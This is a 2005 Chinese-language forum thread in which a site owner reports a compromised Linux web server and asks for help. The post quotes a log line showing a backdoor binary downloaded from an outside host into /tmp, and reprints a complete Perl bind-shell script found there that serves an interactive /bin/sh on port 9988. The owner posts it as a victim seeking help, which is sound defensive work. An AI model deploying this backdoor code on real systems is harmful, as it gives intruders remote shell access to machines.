作者 主題: 好像被種了木馬  (閱讀 3832 次)

0 會員 與 1 訪客 正在閱讀本文。

davidpai

  • 可愛的小學生
  • *
  • 文章數: 9
    • 檢視個人資料
好像被種了木馬
« 於: 2005-09-11 19:56 »
網站掛點,用ssh上去看,發現http daemon還在,可就是連不上
趕緊查apache的error log,找到一筆可疑的紀錄

代碼: [選擇]
--23:24:01--  http://www.groupiys.net/xpl/r0nin
           => `r0nin'
Resolving www.groupiys.net... 66.218.79.178, 66.218.79.185, 66.218.79.173, ...
Connecting to www.groupiys.net[66.218.79.178]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,258 [application/octet-stream]

    0K .......... ........                                   100%   45.90 KB/s

23:24:02 (45.90 KB/s) - `r0nin' saved [19,258/19,258]


到/tmp一看,果然有個r0nin執行檔躺在那裡
再拜請google搜查一番,是個叫做Backdoor.Linux.Phobi.a的後門

同時間在/tmp也看到一個叫做bd.pl的檔案,也是這個groupiys的傑作,打開來看了一下內容,是這樣

代碼: [選擇]
#!/usr/bin/perl
use Socket;
$p=9988;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($p,INADDR_ANY));
listen(S,50);
while(1) {
accept(X,S);
if(!($pid=fork)){
if(!defined $pid){
exit(0);
}
open STDIN,"<&X";
open STDOUT,">&X";
open STDERR,">&X";
exec("/bin/sh -i");
close X;
}
}


由於不會Perl,想請教學長們,這支程式在搞什麼鬼?
我中木馬了嗎?怎麼解決?以後怎麼預防?

hsiao_peter

  • 憂鬱的高中生
  • ***
  • 文章數: 106
    • 檢視個人資料
好像被種了木馬
« 回覆 #1 於: 2005-09-12 08:54 »

davidpai

  • 可愛的小學生
  • *
  • 文章數: 9
    • 檢視個人資料
好像被種了木馬
« 回覆 #2 於: 2005-09-12 15:37 »
謝謝指引, 趕緊來去看看